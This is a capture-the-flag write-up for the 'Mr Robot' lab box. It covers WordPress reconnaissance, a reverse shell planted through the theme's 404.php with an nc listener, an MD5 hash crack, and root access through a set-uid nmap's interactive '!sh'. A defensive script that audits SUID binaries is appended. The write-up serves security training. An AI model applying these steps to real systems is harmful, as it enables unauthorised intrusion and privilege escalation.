
Mr Robot THM{}

80, Wordpress, SUID

Nmap

nmap -T4 10.10.19.91

PORT    STATE  SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https

Gobuster

gobuster dir -u 10.10.19.91 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Interesting directories

http://10.10.19.91/wp-login.php      WORDPRESS LOGIN
http://10.10.19.91/0/                WORDPRESS BLOG
http://10.10.19.91/image/            WORDPRESS BLOG IMAGE
http://10.10.19.91/wp-content/       WHITE BACKGROUND
http://10.10.19.91/admin/            PAGE KEEPS RELOADING
http://10.10.19.91/license           USER:PASSWORD in Inspector
http://10.10.19.91/readme            USELESS MESSAGE
http://10.10.19.91/robots            FIRST KEY


Wpscan

 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.19.91/082c96f.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.19.91/082c96f.html, Match: 'WordPress 4.3.1'

[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.19.91/wp-content/themes/twentyfifteen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://10.10.19.91/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.1
| Style URL: http://10.10.19.91/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.19.91/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'

First key

Information obtained:

http://wordpress.org/?v=4.3.1
elliot:ER28-0652

In /robots (the site's robots.txt), we find the path to the first key.

User-agent: *
fsocity.dic
key-1-of-3.txt

If we go to /fsocity.dic, we download a dictionary, which will be useful for a later brute-force attack. Furthermore, if we go to key-1-of-3.txt, we find the first flag.

WordPress to reverse shell

As we did in the Internal machine, we can establish a reverse shell through WordPress. For that we use the information provided on this site: https://www.hacknos.com/wordpress-shell-upload/ using the 404.php method. For the reverse shell, we use the pentestmonkey PHP reverse shell: https://github.com/pentestmonkey/php-reverse-shell and `nc -lvnp 5555` on our machine.

We can upgrade our shell to a fully interactive TTY using this info: https://www.metahackers.pro/upgrade-shell-to-fully-interactive-tty-shell/

Linpeas

SUID
-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap

Second key

We go to the /home directory and find this user and password hash (unsalted MD5): robot:c3fcd3d76192e4007dfb496cca67e13b. The cracked password is abcdefghijklmnopqrstuvwxyz (the hash is simply MD5 of the lowercase alphabet, which is why a dictionary lookup recovers it instantly). Now we log in as robot and open the file key-2-of-3.txt.

Third key

As the SUID listing shows, nmap is set-uid root. To exploit it, start it in interactive mode with `nmap --interactive` and type `!sh`.

# whoami
root

# ls
firstboot_done key-3-of-3.txt
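The set-uid nmap that gave root above is exactly what a host hardening check should catch before an attacker does. As an added example (not part of the original writeup), this POSIX shell script flags root-owned SUID binaries whose names are on a short risk list; `RISKY_SUID_NAMES` and the sample listing are assumptions I constructed, and the fix on a real host is `chmod u-s` on the flagged file or removing it.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit SUID-root binaries and
# flag those whose name is known to hand out a shell (like nmap --interactive).
# RISKY_SUID_NAMES is an assumed, deliberately short baseline; extend it from
# your own build standard.
RISKY_SUID_NAMES="nmap sh bash"

# is_risky_suid NAME: succeed if NAME is in RISKY_SUID_NAMES
is_risky_suid() {
    for n in $RISKY_SUID_NAMES; do
        [ "$1" = "$n" ] && return 0
    done
    return 1
}

# flag_suid_listing: read 'ls -l' lines on stdin and print the path of every
# root-owned file with the setuid bit whose basename is in RISKY_SUID_NAMES.
flag_suid_listing() {
    while read -r mode _links owner _group _size _m _d _y path; do
        [ "$owner" = root ] || continue
        case "$mode" in
            ???[sS]*) ;;          # 4th mode char s/S = setuid bit set
            *) continue ;;
        esac
        if is_risky_suid "${path##*/}"; then
            printf '%s\n' "$path"
        fi
    done
}

# audit_suid_live: run the check against this host, staying on one filesystem.
audit_suid_live() {
    find / -xdev -type f -perm -4000 -exec ls -l {} + 2>/dev/null | flag_suid_listing
}

# Constructed sample listing: first line is the real finding from this box,
# the others are made-up controls (legit SUID passwd, non-SUID nmap).
SAMPLE_LISTING='-rwsr-xr-x 1 root root 493K Nov 13 2015 /usr/local/bin/nmap
-rwsr-xr-x 1 root root 40K Jan 1 2015 /usr/bin/passwd
-rwxr-xr-x 1 root root 10K Jan 1 2015 /usr/bin/nmap'

# demo_suid_audit: runs the parser over the constructed listing
demo_suid_audit() {
    printf '%s\n' "$SAMPLE_LISTING" | flag_suid_listing
}
```

Run `audit_suid_live` on a real host; only `/usr/local/bin/nmap` is reported for the constructed sample.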